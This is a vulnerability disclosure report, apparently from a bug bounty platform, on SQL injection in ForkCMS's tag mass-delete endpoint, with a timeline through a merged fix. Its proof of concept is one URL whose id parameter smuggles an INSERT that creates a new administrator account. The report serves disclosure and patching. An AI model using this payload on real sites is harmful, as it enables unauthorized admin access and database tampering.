SQL Injection in forkcms/forkcms

Valid

Reported on

Oct 22nd 2021

Description

When calling the url for deleting one or more tags, the parameter id is vulnerable for SQL injection.

Proof of Concept

Call an URL like this one (as an authenticated user).

http://forkcms.site/private/de/tags/mass_action?token=n93e05rj0l&id[]=3);insert into users(email,password,is_god) values ('attacker@example.com','$2y$10$qqJ9L1lIp38gKpqh1V3l1.EqLzj.brB0IqUPQ2XXcSjl6Dtcgq16C',1);--+&action=delete

After calling this URL, the table users has a new entry.

Impact

The attacker can tamper data in the database as they want.

We have contacted a member of the forkcms team and are waiting to hear back 7 months ago

We have sent a follow up to the forkcms team. We will try again in 7 days. 7 months ago

Jelmer Prins validated this vulnerability 7 months ago

starkitsec has been awarded the disclosure bounty

The fix bounty is now up for grabs

Jelmer Prins confirmed that a fix has been merged on 0226a2 2 months ago

Jelmer Prins has been awarded the fix bounty

to join this conversation